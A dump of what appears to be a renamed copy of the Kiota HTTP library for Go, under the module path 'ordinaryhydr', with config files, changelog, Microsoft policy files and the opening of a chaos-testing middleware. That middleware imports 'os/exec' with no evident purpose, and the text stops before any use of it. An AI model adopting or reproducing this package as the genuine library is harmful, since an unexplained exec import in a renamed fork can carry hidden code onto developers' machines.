├── .devcontainer ├── Dockerfile └── devcontainer.json ├── .gitignore ├── .release-please-manifest.json ├── .vscode ├── extensions.json ├── settings.json └── tasks.json ├── CHANGELOG.md ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── SECURITY.md ├── SUPPORT.md ├── chaos_handler.go ├── chaos_handler_test.go ├── compression_handler.go ├── compression_handler_test.go ├── decompression_handler_test.go ├── go.mod ├── go.sum ├── headers_inspection_handler.go ├── headers_inspection_handler_test.go ├── internal ├── mock_entity.go └── mock_parse_node_factory.go ├── kiota_client_factory.go ├── kiota_client_factory_test.go ├── middleware.go ├── nethttp_request_adapter.go ├── nethttp_request_adapter_test.go ├── observability_options.go ├── parameters_name_decoding_handler.go ├── parameters_name_decoding_handler_test.go ├── pipeline.go ├── pipeline_test.go ├── redirect_handler.go ├── redirect_handler_test.go ├── release-please-config.json ├── retry_handler.go ├── retry_handler_test.go ├── sonar-project.properties ├── span_attributes.go ├── url_replace_handler.go ├── url_replace_handler_test.go ├── user_agent_handler.go └── user_agent_handler_test.go /.devcontainer/Dockerfile: -------------------------------------------------------------------------------- 1 | # [Choice] Go version (use -bullseye variants on local arm64/Apple Silicon): 1, 1.16, 1.17, 1-bullseye, 1.16-bullseye, 1.17-bullseye, 1-buster, 1.16-buster, 1.17-buster 2 | ARG VARIANT=1-bullseye 3 | FROM mcr.microsoft.com/vscode/devcontainers/go:0-${VARIANT} 4 | 5 | # [Choice] Node.js version: none, lts/*, 16, 14, 12, 10 6 | ARG NODE_VERSION="none" 7 | RUN if [ "${NODE_VERSION}" != "none" ]; then su vscode -c "umask 0002 && . /usr/local/share/nvm/nvm.sh && nvm install ${NODE_VERSION} 2>&1"; fi 8 | 9 | # [Optional] Uncomment this section to install additional OS packages. 10 | RUN apt-get update && export DEBIAN_FRONTEND=noninteractive \ 11 | && apt-get dist-upgrade -y 12 | # && apt-get -y install --no-install-recommends 13 | 14 | # [Optional] Uncomment the next lines to use go get to install anything else you need 15 | # USER vscode 16 | # RUN go get -x 17 | 18 | # [Optional] Uncomment this line to install global node packages. 19 | # RUN su vscode -c "source /usr/local/share/nvm/nvm.sh && npm install -g " 2>&1 20 | -------------------------------------------------------------------------------- /.devcontainer/devcontainer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Go", 3 | "build": { 4 | "dockerfile": "Dockerfile", 5 | "args": { 6 | // Update the VARIANT arg to pick a version of Go: 1, 1.18, 1.17 7 | // Append -bullseye or -buster to pin to an OS version. 8 | // Use -bullseye variants on local arm64/Apple Silicon. 9 | "VARIANT": "1-bullseye", 10 | // Options 11 | "NODE_VERSION": "lts/*" 12 | } 13 | }, 14 | "runArgs": [ "--cap-add=SYS_PTRACE", "--security-opt", "seccomp=unconfined" ], 15 | 16 | // Set *default* container specific settings.json values on container create. 17 | "settings": { 18 | "go.toolsManagement.checkForUpdates": "local", 19 | "go.useLanguageServer": true, 20 | "go.gopath": "/go" 21 | }, 22 | 23 | // Add the IDs of extensions you want installed when the container is created. 24 | "extensions": [ 25 | "golang.Go", 26 | "EditorConfig.EditorConfig", 27 | "GitHub.copilot", 28 | "GitHub.vscode-pull-request-github", 29 | "donjayamanne.githistory", 30 | "waderyan.gitblame", 31 | "streetsidesoftware.code-spell-checker", 32 | "VisualStudioExptTeam.vscodeintellicode", 33 | "ms-vsliveshare.vsliveshare", 34 | "esbenp.prettier-vscode" 35 | ], 36 | 37 | // Use 'forwardPorts' to make a list of ports inside the container available locally. 38 | // "forwardPorts": [], 39 | 40 | // Use 'postCreateCommand' to run commands after the container is created. 41 | // "postCreateCommand": "go version", 42 | 43 | // Comment out to connect as root instead. More info: https://aka.ms/vscode-remote/containers/non-root. 44 | "remoteUser": "vscode", 45 | "features": { 46 | "ghcr.io/devcontainers/features/github-cli:1": { 47 | "version": "latest" 48 | }, 49 | "ghcr.io/devcontainers/features/powershell:1": { 50 | "version": "latest" 51 | } 52 | }, 53 | "postStartCommand": "git config gpg.program gpg" // in case commits sign in is configured on windows and mapped to the gpg4win proc. To reset (when starting locally) `git config --unset gpg.program 54 | } 55 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | 17 | .idea 18 | -------------------------------------------------------------------------------- /.release-please-manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | ".": "1.5.3" 3 | } -------------------------------------------------------------------------------- /.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": [ 3 | "editorconfig.editorconfig", 4 | "github.copilot", 5 | "github.vscode-pull-request-github", 6 | "donjayamanne.githistory", 7 | "waderyan.gitblame", 8 | "streetsidesoftware.code-spell-checker", 9 | "visualstudioexptteam.vscodeintellicode", 10 | "ms-vsliveshare.vsliveshare", 11 | "esbenp.prettier-vscode" 12 | ] 13 | } -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "cSpell.words": [ 3 | "kiota", 4 | "nethttp", 5 | "nethttplibrary" 6 | ] 7 | } -------------------------------------------------------------------------------- /.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "2.0.0", 3 | "tasks": [ 4 | { 5 | "label": "build", 6 | "command": "go", 7 | "type": "process", 8 | "group": "build", 9 | "args": [ 10 | "build" 11 | ], 12 | "problemMatcher": [ 13 | "$go" 14 | ] 15 | }, 16 | { 17 | "label": "test", 18 | "command": "go", 19 | "type": "process", 20 | "group": "test", 21 | "args": [ 22 | "test" 23 | ], 24 | "problemMatcher": [ 25 | "$go" 26 | ] 27 | } 28 | ] 29 | } -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Changelog 2 | 3 | All notable changes to this project will be documented in this file. 4 | 5 | ## [1.5.3](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.5.2...v1.5.3) (2025-04-03) 6 | 7 | 8 | ### Bug Fixes 9 | 10 | * adding middleware with options errors with "unsupported option type" ([beeb32d](https://github.com/ordinaryhydr/kiota-http-go/commit/beeb32db1f6a5ebabfd4efdf66d701a6d12ed43f)) 11 | 12 | ## [1.5.2](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.5.1...v1.5.2) (2025-04-02) 13 | 14 | 15 | ### Bug Fixes 16 | 17 | * removes common go dependency ([42c2137](https://github.com/ordinaryhydr/kiota-http-go/commit/42c21377c7d3af3863bfcfcf28956cdaad99c850)) 18 | * removes common go dependency ([df1bf28](https://github.com/ordinaryhydr/kiota-http-go/commit/df1bf281692b9b3dede2f1a845cb590c0a490717)) 19 | 20 | ## [1.5.1](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.5.0...v1.5.1) (2025-03-24) 21 | 22 | 23 | ### Bug Fixes 24 | 25 | * upgrades common go dependency to solve triming issues ([4a57c46](https://github.com/ordinaryhydr/kiota-http-go/commit/4a57c4687dec3e8d6801538c458cab19f47a480d)) 26 | * upgrades common go dependency to solve triming issues ([d1aa07f](https://github.com/ordinaryhydr/kiota-http-go/commit/d1aa07f2a1b9c0d21f5808a8be41c65f236c8929)) 27 | 28 | ## [1.5.0](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.4.7...v1.5.0) (2025-03-13) 29 | 30 | 31 | ### Features 32 | 33 | * upgrades required go version from go1.18 to go 1.22 ([2e60cd5](https://github.com/ordinaryhydr/kiota-http-go/commit/2e60cd5800241b2c08b21ab523d9ffc216383db0)) 34 | 35 | ## [1.4.7] - 2024-12-13 36 | 37 | ### Changed 38 | 39 | - Updated HTTP span attributes to comply with updated OpenTelemetry semantic conventions. [#182](https://github.com/ordinaryhydr/kiota-http-go/issues/182) 40 | 41 | ## [1.4.6] - 2024-12-13 42 | 43 | ### Changed 44 | 45 | - Fixed a bug where headers inspection handler would fail upon receiving an error. 46 | 47 | ## [1.4.5] - 2024-09-03 48 | 49 | ### Changed 50 | 51 | - Fixed a bug in compression middleware which caused empty body to send on retries 52 | 53 | ## [1.4.4] - 2024-08-13 54 | 55 | ### Changed 56 | 57 | - Added `http.request.resend_delay` as a span attribute for the retry handler 58 | - Changed the `http.retry_count` span attribute to `http.request.resend_count` to conform to OpenTelemetry specs. 59 | 60 | ## [1.4.3] - 2024-07-22 61 | 62 | ### Changed 63 | 64 | - Fixed a bug to prevent double request compression by the compression handler. 65 | 66 | ## [1.4.2] - 2024-07-16 67 | 68 | ### Changed 69 | 70 | - Prevent compression if Content-Range header is present. 71 | - Fix bug which leads to a missing Content-Length header. 72 | 73 | ## [1.4.1] - 2024-05-09 74 | 75 | ### Changed 76 | 77 | - Allow custom response handlers to return nil result values. 78 | 79 | ## [1.4.0] - 2024-05-09 80 | 81 | - Support retry after as a date. 82 | 83 | ## [1.3.3] - 2024-03-19 84 | 85 | - Fix bug where overriding http.DefaultTransport with an implementation other than http.Transport would result in an interface conversion panic 86 | 87 | ### Changed 88 | 89 | ## [1.3.2] - 2024-02-28 90 | 91 | ### Changed 92 | 93 | - Fix bug with headers inspection handler using wrong key. 94 | 95 | ## [1.3.1] - 2024-02-09 96 | 97 | ### Changed 98 | 99 | - Fix bug that resulted in the error "content is empty" being returned instead of HTTP status information if the request returned no content and an unsuccessful status code. 100 | 101 | ## [1.3.0] - 2024-01-22 102 | 103 | ### Added 104 | 105 | - Added support to override default middleware with function `GetDefaultMiddlewaresWithOptions`. 106 | 107 | ## [1.2.1] - 2023-01-22 108 | 109 | ### Changed 110 | 111 | - Fix bug passing no timeout in client as 0 timeout in context . 112 | 113 | ## [1.2.0] - 2024-01-22 114 | 115 | ### Added 116 | 117 | - Adds support for XXX status code. 118 | 119 | ## [1.1.2] - 2024-01-20 120 | 121 | ### Changed 122 | 123 | - Changed the code by replacing ioutil.ReadAll and ioutil.NopCloser with io.ReadAll and io.NopCloser, respectively, due to their deprecation. 124 | 125 | ## [1.1.1] - 2023-11-22 126 | 127 | ### Added 128 | 129 | - Added response headers and status code to returned error in `throwIfFailedResponse`. 130 | 131 | ## [1.1.0] - 2023-08-11 132 | 133 | ### Added 134 | 135 | - Added headers inspection middleware and option. 136 | 137 | ## [1.0.1] - 2023-07-19 138 | 139 | ### Changed 140 | 141 | - Bug Fix: Update Host for Redirect URL in go client. 142 | 143 | ## [1.0.0] - 2023-05-04 144 | 145 | ### Changed 146 | 147 | - GA Release. 148 | 149 | ## [0.17.0] - 2023-04-26 150 | 151 | ### Added 152 | 153 | - Adds Response Headers to the ApiError returned on Api requests errors. 154 | 155 | ## [0.16.2] - 2023-04-17 156 | 157 | ### Added 158 | 159 | - Exit retry handler earlier if context is done. 160 | - Adds exported method `ReplacePathTokens` that can be used to process url replacement logic globally. 161 | 162 | ## [0.16.1] - 2023-03-20 163 | 164 | ### Added 165 | 166 | - Context deadline for requests defaults to client timeout when not provided. 167 | 168 | ## [0.16.0] - 2023-03-01 169 | 170 | ### Added 171 | 172 | - Adds ResponseStatusCode to the ApiError returned on Api requests errors. 173 | 174 | ## [0.15.0] - 2023-02-23 175 | 176 | ### Added 177 | 178 | - Added UrlReplaceHandler that replaces segments of the URL. 179 | 180 | ## [0.14.0] - 2023-01-25 181 | 182 | ### Added 183 | 184 | - Added implementation methods for backing store. 185 | 186 | ## [0.13.0] - 2023-01-10 187 | 188 | ### Added 189 | 190 | - Added a method to convert abstract requests to native requests in the request adapter interface. 191 | 192 | ## [0.12.0] - 2023-01-05 193 | 194 | ### Added 195 | 196 | - Added User Agent handler to add the library information as a product to the header. 197 | 198 | ## [0.11.0] - 2022-12-20 199 | 200 | ### Changed 201 | 202 | - Fixed a bug where retry handling wouldn't rewind the request body before retrying. 203 | 204 | ## [0.10.0] - 2022-12-15 205 | 206 | ### Added 207 | 208 | - Added support for multi-valued request headers. 209 | 210 | ### Changed 211 | 212 | - Fixed http.request_content_length attribute name for tracing 213 | 214 | ## [0.9.0] - 2022-09-27 215 | 216 | ### Added 217 | 218 | - Added support for tracing via OpenTelemetry. 219 | 220 | ## [0.8.1] - 2022-09-26 221 | 222 | ### Changed 223 | 224 | - Fixed bug for http go where response handler was overwritten in context object. 225 | 226 | ## [0.8.0] - 2022-09-22 227 | 228 | ### Added 229 | 230 | - Added support for constructing a proxy authenticated client. 231 | 232 | ## [0.7.2] - 2022-09-09 233 | 234 | ### Changed 235 | 236 | - Updated reference to abstractions. 237 | 238 | ## [0.7.1] - 2022-09-07 239 | 240 | ### Added 241 | 242 | - Added support for additional status codes. 243 | 244 | ## [0.7.0] - 2022-08-24 245 | 246 | ### Added 247 | 248 | - Adds context param in send async methods 249 | 250 | ## [0.6.2] - 2022-08-30 251 | 252 | ### Added 253 | 254 | - Default 100 secs timeout for all request with a default context. 255 | 256 | ## [0.6.1] - 2022-08-29 257 | 258 | ### Changed 259 | 260 | - Fixed a bug where an error would be returned for a 201 response with described response. 261 | 262 | ## [0.6.0] - 2022-08-17 263 | 264 | ### Added 265 | 266 | - Adds a chaos handler optional middleware for tests 267 | 268 | ## [0.5.2] - 2022-06-27 269 | 270 | ### Changed 271 | 272 | - Fixed an issue where response error was ignored for Patch calls 273 | 274 | ## [0.5.1] - 2022-06-07 275 | 276 | ### Changed 277 | 278 | - Updated abstractions and yaml dependencies. 279 | 280 | ## [0.5.0] - 2022-05-26 281 | 282 | ### Added 283 | 284 | - Adds support for enum or enum collections responses 285 | 286 | ## [0.4.1] - 2022-05-19 287 | 288 | ### Changed 289 | 290 | - Fixed a bug where CAE support would leak connections when retrying. 291 | 292 | ## [0.4.0] - 2022-05-18 293 | 294 | ### Added 295 | 296 | - Adds support for continuous access evaluation. 297 | 298 | ## [0.3.0] - 2022-04-19 299 | 300 | ### Changed 301 | 302 | - Upgraded to abstractions 0.4.0. 303 | - Upgraded to go 18. 304 | 305 | ## [0.2.0] - 2022-04-08 306 | 307 | ### Added 308 | 309 | - Added support for decoding special characters in query parameters names. 310 | 311 | ## [0.1.0] - 2022-03-30 312 | 313 | ### Added 314 | 315 | - Initial tagged release of the library. 316 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Microsoft Open Source Code of Conduct 2 | 3 | This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). 4 | 5 | Resources: 6 | 7 | - [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/) 8 | - [Microsoft Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) 9 | - Contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with questions or concerns 10 | - Employees can reach out at [aka.ms/opensource/moderation-support](https://aka.ms/opensource/moderation-support) 11 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to the Kiota HTTP adapter for Go 2 | 3 | The Kiota HTTP adapter for Go is available for all manner of contribution. There are a couple of different recommended paths to get contributions into the released version of this SDK. 4 | 5 | __NOTE__ A signed a contribution license agreement is required for all contributions, and is checked automatically on new pull requests. Please read and sign [the agreement](https://cla.microsoft.com/) before starting any work for this repository. 6 | 7 | ## File issues 8 | 9 | The best way to get started with a contribution is to start a dialog with the owners of this repository. Sometimes features will be under development or out of scope for this SDK and it's best to check before starting work on contribution. 10 | 11 | ## Submit pull requests for trivial changes 12 | 13 | If you are making a change that does not affect the interface components and does not affect other downstream callers, feel free to make a pull request against the __dev__ branch. The dev branch will be updated frequently. 14 | 15 | Revisions of this nature will result in a 0.0.X change of the version number. 16 | 17 | ## Submit pull requests for features 18 | 19 | If major functionality is being added, or there will need to be gestation time for a change, it should be submitted against the __feature__ branch. 20 | 21 | Revisions of this nature will result in a 0.X.X change of the version number. 22 | 23 | ## Commit message format 24 | 25 | To support our automated release process, pull requests are required to follow the [Conventional Commit](https://www.conventionalcommits.org/en/v1.0.0/) 26 | format. 27 | 28 | Each commit message consists of a **header**, an optional **body** and an optional **footer**. The header is the first line of the commit and 29 | MUST have a **type** (see below for a list of types) and a **description**. An optional **scope** can be added to the header to give extra context. 30 | 31 | ``` 32 | [optional scope]: 33 | 34 | 35 | 36 | 37 | ``` 38 | 39 | The recommended commit types used are: 40 | 41 | - **feat** for feature updates (increments the _minor_ version) 42 | - **fix** for bug fixes (increments the _patch_ version) 43 | - **perf** for performance related changes e.g. optimizing an algorithm 44 | - **refactor** for code refactoring changes 45 | - **test** for test suite updates e.g. adding a test or fixing a test 46 | - **style** for changes that don't affect the meaning of code. e.g. formatting changes 47 | - **docs** for documentation updates e.g. ReadMe update or code documentation updates 48 | - **build** for build system changes (gradle updates, external dependency updates) 49 | - **ci** for CI configuration file changes e.g. updating a pipeline 50 | - **chore** for miscallaneous non-sdk changesin the repo e.g. removing an unused file 51 | 52 | Adding a footer with the prefix **BREAKING CHANGE:** will cause an increment of the _major_ version. -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) Microsoft Corporation. 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Kiota Http Library for Go 2 | 3 | ![Go](https://github.com/ordinaryhydr/kiota-http-go/actions/workflows/go.yml/badge.svg) 4 | 5 | The Kiota HTTP Library for Go is the Go HTTP library implementation with [net/http](https://pkg.go.dev/net/http). 6 | 7 | A [Kiota](https://github.com/microsoft/kiota) generated project will need a reference to a HTTP package to make HTTP requests to an API endpoint. 8 | 9 | Read more about Kiota [here](https://github.com/microsoft/kiota/blob/main/README.md). 10 | 11 | ## Using the Kiota Http Library for Go 12 | 13 | ```Shell 14 | go get github.com/ordinaryhydr/kiota-http-go 15 | ``` 16 | 17 | ```Golang 18 | httpAdapter, err := kiotahttp.NewNetHttpRequestAdapter(authProvider) 19 | ``` 20 | 21 | ## Contributing 22 | 23 | This project welcomes contributions and suggestions. Most contributions require you to agree to a 24 | Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us 25 | the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com. 26 | 27 | When you submit a pull request, a CLA bot will automatically determine whether you need to provide 28 | a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions 29 | provided by the bot. You will only need to do this once across all repos using our CLA. 30 | 31 | This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). 32 | For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or 33 | contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. 34 | 35 | ## Trademarks 36 | 37 | This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft 38 | trademarks or logos is subject to and must follow 39 | [Microsoft's Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). 40 | Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. 41 | Any use of third-party trademarks or logos are subject to those third-party's policies. 42 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## Security 4 | 5 | Microsoft takes the security of our software products and services seriously, which includes all source code repositories managed through our GitHub organizations, which include [Microsoft](https://github.com/Microsoft), [Azure](https://github.com/Azure), [DotNet](https://github.com/dotnet), [AspNet](https://github.com/aspnet), [Xamarin](https://github.com/xamarin), and [our GitHub organizations](https://opensource.microsoft.com/). 6 | 7 | If you believe you have found a security vulnerability in any Microsoft-owned repository that meets [Microsoft's definition of a security vulnerability](https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc751383(v=technet.10)), please report it to us as described below. 8 | 9 | ## Reporting Security Issues 10 | 11 | **Please do not report security vulnerabilities through public GitHub issues.** 12 | 13 | Instead, please report them to the Microsoft Security Response Center (MSRC) at [https://msrc.microsoft.com/create-report](https://msrc.microsoft.com/create-report). 14 | 15 | If you prefer to submit without logging in, send email to [secure@microsoft.com](mailto:secure@microsoft.com). If possible, encrypt your message with our PGP key; please download it from the [Microsoft Security Response Center PGP Key page](https://www.microsoft.com/en-us/msrc/pgp-key-msrc). 16 | 17 | You should receive a response within 24 hours. If for some reason you do not, please follow up via email to ensure we received your original message. Additional information can be found at [microsoft.com/msrc](https://www.microsoft.com/msrc). 18 | 19 | Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue: 20 | 21 | * Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.) 22 | * Full paths of source file(s) related to the manifestation of the issue 23 | * The location of the affected source code (tag/branch/commit or direct URL) 24 | * Any special configuration required to reproduce the issue 25 | * Step-by-step instructions to reproduce the issue 26 | * Proof-of-concept or exploit code (if possible) 27 | * Impact of the issue, including how an attacker might exploit the issue 28 | 29 | This information will help us triage your report more quickly. 30 | 31 | If you are reporting for a bug bounty, more complete reports can contribute to a higher bounty award. Please visit our [Microsoft Bug Bounty Program](https://microsoft.com/msrc/bounty) page for more details about our active programs. 32 | 33 | ## Preferred Languages 34 | 35 | We prefer all communications to be in English. 36 | 37 | ## Policy 38 | 39 | Microsoft follows the principle of [Coordinated Vulnerability Disclosure](https://www.microsoft.com/en-us/msrc/cvd). 40 | 41 | -------------------------------------------------------------------------------- /SUPPORT.md: -------------------------------------------------------------------------------- 1 | # TODO: The maintainer of this repo has not yet edited this file 2 | 3 | **REPO OWNER**: Do you want Customer Service & Support (CSS) support for this product/project? 4 | 5 | - **No CSS support:** Fill out this template with information about how to file issues and get help. 6 | - **Yes CSS support:** Fill out an intake form at [aka.ms/spot](https://aka.ms/spot). CSS will work with/help you to determine next steps. More details also available at [aka.ms/onboardsupport](https://aka.ms/onboardsupport). 7 | - **Not sure?** Fill out a SPOT intake as though the answer were "Yes". CSS will help you decide. 8 | 9 | *Then remove this first heading from this SUPPORT.MD file before publishing your repo.* 10 | 11 | # Support 12 | 13 | ## How to file issues and get help 14 | 15 | This project uses GitHub Issues to track bugs and feature requests. Please search the existing 16 | issues before filing new issues to avoid duplicates. For new issues, file your bug or 17 | feature request as a new Issue. 18 | 19 | For help and questions about using this project, please **REPO MAINTAINER: INSERT INSTRUCTIONS HERE 20 | FOR HOW TO ENGAGE REPO OWNERS OR COMMUNITY FOR HELP. COULD BE A STACK OVERFLOW TAG OR OTHER 21 | CHANNEL. WHERE WILL YOU HELP PEOPLE?**. 22 | 23 | ## Microsoft Support Policy 24 | 25 | Support for this **PROJECT or PRODUCT** is limited to the resources listed above. 26 | -------------------------------------------------------------------------------- /chaos_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "os/exec" 5 | "errors" 6 | "io" 7 | "math/rand" 8 | nethttp "net/http" 9 | "regexp" 10 | "strings" 11 | 12 | abstractions "github.com/microsoft/kiota-abstractions-go" 13 | "go.opentelemetry.io/otel" 14 | "go.opentelemetry.io/otel/attribute" 15 | "go.opentelemetry.io/otel/trace" 16 | ) 17 | 18 | type ChaosStrategy int 19 | 20 | const ( 21 | Manual ChaosStrategy = iota 22 | Random 23 | ) 24 | 25 | // ChaosHandlerOptions is a configuration struct holding behavior defined options for a chaos handler 26 | // 27 | // BaseUrl represent the host url for in 28 | // ChaosStrategy Specifies the strategy used for the Testing Handler -> RANDOM/MANUAL 29 | // StatusCode Status code to be returned as part of the error response 30 | // StatusMessage Message to be returned as part of the error response 31 | // ChaosPercentage The percentage of randomness/chaos in the handler 32 | // ResponseBody The response body to be returned as part of the error response 33 | // Headers The response headers to be returned as part of the error response 34 | // StatusMap The Map passed by user containing url-statusCode info 35 | type ChaosHandlerOptions struct { 36 | BaseUrl string 37 | ChaosStrategy ChaosStrategy 38 | StatusCode int 39 | StatusMessage string 40 | ChaosPercentage int 41 | ResponseBody *nethttp.Response 42 | Headers map[string][]string 43 | StatusMap map[string]map[string]int 44 | } 45 | 46 | type chaosHandlerOptionsInt interface { 47 | abstractions.RequestOption 48 | GetBaseUrl() string 49 | GetChaosStrategy() ChaosStrategy 50 | GetStatusCode() int 51 | GetStatusMessage() string 52 | GetChaosPercentage() int 53 | GetResponseBody() *nethttp.Response 54 | GetHeaders() map[string][]string 55 | GetStatusMap() map[string]map[string]int 56 | } 57 | 58 | func (handlerOptions *ChaosHandlerOptions) GetBaseUrl() string { 59 | return handlerOptions.BaseUrl 60 | } 61 | 62 | func (handlerOptions *ChaosHandlerOptions) GetChaosStrategy() ChaosStrategy { 63 | return handlerOptions.ChaosStrategy 64 | } 65 | 66 | func (handlerOptions *ChaosHandlerOptions) GetStatusCode() int { 67 | return handlerOptions.StatusCode 68 | } 69 | 70 | func (handlerOptions *ChaosHandlerOptions) GetStatusMessage() string { 71 | return handlerOptions.StatusMessage 72 | } 73 | 74 | func (handlerOptions *ChaosHandlerOptions) GetChaosPercentage() int { 75 | return handlerOptions.ChaosPercentage 76 | } 77 | 78 | func (handlerOptions *ChaosHandlerOptions) GetResponseBody() *nethttp.Response { 79 | return handlerOptions.ResponseBody 80 | } 81 | 82 | func (handlerOptions *ChaosHandlerOptions) GetHeaders() map[string][]string { 83 | return handlerOptions.Headers 84 | } 85 | 86 | func (handlerOptions *ChaosHandlerOptions) GetStatusMap() map[string]map[string]int { 87 | return handlerOptions.StatusMap 88 | } 89 | 90 | type ChaosHandler struct { 91 | options *ChaosHandlerOptions 92 | } 93 | 94 | var chaosHandlerKey = abstractions.RequestOptionKey{Key: "ChaosHandler"} 95 | 96 | // GetKey returns ChaosHandlerOptions unique name in context object 97 | func (handlerOptions *ChaosHandlerOptions) GetKey() abstractions.RequestOptionKey { 98 | return chaosHandlerKey 99 | } 100 | 101 | // NewChaosHandlerWithOptions creates a new ChaosHandler with the configured options 102 | func NewChaosHandlerWithOptions(handlerOptions *ChaosHandlerOptions) (*ChaosHandler, error) { 103 | if handlerOptions == nil { 104 | return nil, errors.New("unexpected argument ChaosHandlerOptions as nil") 105 | } 106 | 107 | if handlerOptions.ChaosPercentage < 0 || handlerOptions.ChaosPercentage > 100 { 108 | return nil, errors.New("ChaosPercentage must be between 0 and 100") 109 | } 110 | if handlerOptions.ChaosStrategy == Manual { 111 | if handlerOptions.StatusCode == 0 { 112 | return nil, errors.New("invalid status code for manual strategy") 113 | } 114 | } 115 | 116 | return &ChaosHandler{options: handlerOptions}, nil 117 | } 118 | 119 | // NewChaosHandler creates a new ChaosHandler with default configuration options of Random errors at 10% 120 | func NewChaosHandler() *ChaosHandler { 121 | return &ChaosHandler{ 122 | options: &ChaosHandlerOptions{ 123 | ChaosPercentage: 10, 124 | ChaosStrategy: Random, 125 | StatusMessage: "A random error message", 126 | }, 127 | } 128 | } 129 | 130 | var methodStatusCode = map[string][]int{ 131 | "GET": {429, 500, 502, 503, 504}, 132 | "POST": {429, 500, 502, 503, 504, 507}, 133 | "PUT": {429, 500, 502, 503, 504, 507}, 134 | "PATCH": {429, 500, 502, 503, 504}, 135 | "DELETE": {429, 500, 502, 503, 504, 507}, 136 | } 137 | 138 | var httpStatusCode = map[int]string{ 139 | 100: "Continue", 140 | 101: "Switching Protocols", 141 | 102: "Processing", 142 | 103: "Early Hints", 143 | 200: "OK", 144 | 201: "Created", 145 | 202: "Accepted", 146 | 203: "Non-Authoritative Information", 147 | 204: "No Content", 148 | 205: "Reset Content", 149 | 206: "Partial Content", 150 | 207: "Multi-Status", 151 | 208: "Already Reported", 152 | 226: "IM Used", 153 | 300: "Multiple Choices", 154 | 301: "Moved Permanently", 155 | 302: "Found", 156 | 303: "See Other", 157 | 304: "Not Modified", 158 | 305: "Use Proxy", 159 | 307: "Temporary Redirect", 160 | 308: "Permanent Redirect", 161 | 400: "Bad Request", 162 | 401: "Unauthorized", 163 | 402: "Payment Required", 164 | 403: "Forbidden", 165 | 404: "Not Found", 166 | 405: "Method Not Allowed", 167 | 406: "Not Acceptable", 168 | 407: "Proxy Authentication Required", 169 | 408: "Request Timeout", 170 | 409: "Conflict", 171 | 410: "Gone", 172 | 411: "Length Required", 173 | 412: "Precondition Failed", 174 | 413: "Payload Too Large", 175 | 414: "URI Too Long", 176 | 415: "Unsupported Media Type", 177 | 416: "Range Not Satisfiable", 178 | 417: "Expectation Failed", 179 | 421: "Misdirected Request", 180 | 422: "Unprocessable Entity", 181 | 423: "Locked", 182 | 424: "Failed Dependency", 183 | 425: "Too Early", 184 | 426: "Upgrade Required", 185 | 428: "Precondition Required", 186 | 429: "Too Many Requests", 187 | 431: "Request Header Fields Too Large", 188 | 451: "Unavailable For Legal Reasons", 189 | 500: "Internal Server Error", 190 | 501: "Not Implemented", 191 | 502: "Bad Gateway", 192 | 503: 